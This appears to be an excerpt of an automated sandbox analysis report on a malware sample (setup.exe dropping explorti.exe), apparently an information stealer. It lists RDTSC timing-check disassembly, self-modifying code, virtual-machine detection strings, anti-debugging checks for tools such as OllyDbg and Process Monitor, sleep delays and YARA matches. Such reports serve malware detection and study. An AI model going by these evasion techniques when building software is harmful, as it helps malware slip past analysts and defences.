Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150CC3 second address: 5150D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, BD3Ah 0x00000007 pushfd 0x00000008 jmp 00007FC169461A9Bh 0x0000000d or ah, FFFFFFDEh 0x00000010 jmp 00007FC169461AA9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b mov dx, 68F2h 0x0000001f call 00007FC169461AA3h 0x00000024 mov esi, 7954F78Fh 0x00000029 pop eax 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007FC169461A9Bh 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007FC169461A9Bh 0x0000003c adc esi, 559A244Eh 0x00000042 jmp 00007FC169461AA9h 0x00000047 popfd 0x00000048 mov bx, si 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150D57 second address: 5150DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c jmp 00007FC16945A27Eh 0x00000011 push dword ptr [ebp+08h] 0x00000014 jmp 00007FC16945A280h 0x00000019 push 4B8DDD49h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FC16945A27Ah 0x00000026 call 00007FC16945A282h 0x0000002b pop ecx 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150DF0 second address: 5150DFF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5150DFF second address: 5150E86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 movzx eax, al 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ch 0x00000013 add si, 2CA8h 0x00000018 jmp 00007FC16945A27Bh 0x0000001d popfd 0x0000001e call 00007FC16945A288h 0x00000023 pushfd 0x00000024 jmp 00007FC16945A282h 0x00000029 and cx, 5A38h 0x0000002e jmp 00007FC16945A27Bh 0x00000033 popfd 0x00000034 pop esi 0x00000035 popad 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov eax, 6CE14667h 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100726 second address: 510072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510072C second address: 5100732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100732 second address: 5100753 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FC169461AA0h 0x00000011 pop eax 0x00000012 mov ax, dx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100753 second address: 51007A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A27Eh 0x00000011 sbb cl, 00000008h 0x00000014 jmp 00007FC16945A27Bh 0x00000019 popfd 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov ecx, 57ABC077h 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A280h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51007A6 second address: 51007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51007B5 second address: 5100816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 54531947h 0x0000000e jmp 00007FC16945A287h 0x00000013 add dword ptr [esp], 22A6A6D1h 0x0000001a jmp 00007FC16945A286h 0x0000001f push 3F4E352Bh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100816 second address: 510081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 510081A second address: 5100820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100820 second address: 5100881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461A9Bh 0x00000009 and ch, FFFFFFCEh 0x0000000c jmp 00007FC169461AA9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 49BE9B2Bh 0x0000001e jmp 00007FC169461A9Ch 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 pushad 0x0000002a mov ax, 781Dh 0x0000002e mov dx, si 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC169461A9Bh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100881 second address: 51008E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ah 0x00000013 jmp 00007FC16945A285h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC16945A280h 0x0000001f or ecx, 3997A768h 0x00000025 jmp 00007FC16945A27Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 51008E7 second address: 5100914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461A9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100A1A second address: 5100AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC16945A27Dh 0x0000000b sub ax, 7B36h 0x00000010 jmp 00007FC16945A281h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC16945A27Eh 0x0000001d mov eax, dword ptr [76FBB370h] 0x00000022 jmp 00007FC16945A280h 0x00000027 xor dword ptr [ebp-08h], eax 0x0000002a pushad 0x0000002b jmp 00007FC16945A27Eh 0x00000030 pushfd 0x00000031 jmp 00007FC16945A282h 0x00000036 xor cx, E3E8h 0x0000003b jmp 00007FC16945A27Bh 0x00000040 popfd 0x00000041 popad 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AA8 second address: 5100AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AAC second address: 5100AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AB0 second address: 5100AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AB6 second address: 5100AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AD0 second address: 5100AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100AD4 second address: 5100B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FC16945A27Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FC16945A280h 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC16945A27Ch 0x00000022 or esi, 3A11AB08h 0x00000028 jmp 00007FC16945A27Bh 0x0000002d popfd 0x0000002e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B21 second address: 5100B6C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, E638h 0x0000000b popad 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 jmp 00007FC169461AA7h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a jmp 00007FC169461AA6h 0x0000001f mov eax, dword ptr [esi+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B6C second address: 5100B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B70 second address: 5100B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B76 second address: 5100B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100B7B second address: 5100BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 8937h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FC169461A9Ah 0x00000012 jne 00007FC1DB220C28h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FC169461A9Dh 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007FC169461AA1h 0x00000027 add ecx, 70F49246h 0x0000002d jmp 00007FC169461AA1h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100BD4 second address: 5100C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 jmp 00007FC16945A282h 0x00000018 mov ebx, dword ptr [esi] 0x0000001a pushad 0x0000001b push esi 0x0000001c movsx ebx, ax 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bl, 14h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100C11 second address: 5100C2E instructions: 0x00000000 rdtsc 0x00000002 mov si, 378Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 5100C2E second address: 5100C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov bh, 3Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ebx, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC16945A282h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 666B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 11F6B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window / User API: threadDelayed 450
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4296 Thread sleep time: -54027s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep count: 56 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820 Thread sleep time: -112056s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep count: 450 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -13500000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5480 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep count: 47 > 30
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696 Thread sleep time: -94047s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread delayed: delay time: 30000
Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWSo
Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp
Source: setup.exe, 00000000.00000002.1692432472.0000000001411000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.1691582983.00000000005BA000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1716995664.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1729377013.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: setup.exe, 00000000.00000003.1659828144.0000000001427000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: SIWVID
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_05150DB0 rdtsc 0_2_05150DB0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8645B mov eax, dword ptr fs:[00000030h] 6_2_00F8645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F8A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00F8A1C2
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: >Program Manager
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6D312 cpuid 6_2_00F6D312
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00F6CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 6_2_00F6CB1A

Stealing of Sensitive Information

Source: Yara match File source: 2.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.3c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1651021209.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1689016813.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2289232500.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1691354588.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1676236773.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1716934114.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1729291467.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY